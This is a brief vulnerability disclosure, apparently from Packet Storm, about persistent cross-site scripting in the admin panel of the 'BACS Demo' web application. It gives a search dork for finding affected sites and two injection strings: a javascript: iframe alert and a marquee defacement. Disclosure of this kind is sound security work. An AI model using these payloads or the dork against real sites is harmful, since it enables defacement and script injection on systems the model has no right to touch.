BACS Demo suffers from a persistent cross site scripting vulnerability.
c8a30d985bc0894a71878f365868aa162df6b74b4e18f16f748406eb51c0de6bBACS DEMO persistent XSS vulnerabilties
vendor: www.bacsdemo.com
Author: Karthik R (3psil0nLambDa)
Email: Karthik.cupid@gmail.com
My blog: epsilonlambda.co.cc
Google dork: Copyright © 2009 Coupon codes
Exploits:
Persistent XSS vulnerability in the admin panel->static page->add new section. In html mode type the following string:
"><iframe src="javascript:alert('XSS');"></iframe>
Click update. Javascript alert box pops up \m/
Persistent XSS vulnerability in admin panel->tags->manage tags and also in the add new tag field section. In the search box type in the following string.
"><marquee><h1>Hacker</h1></marquee>
The webpage is defaced with the following marquee on the screen.\m/
-------------------------------------------------------------------------------------------
Tribite to side^effects and love to taashu.
-------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed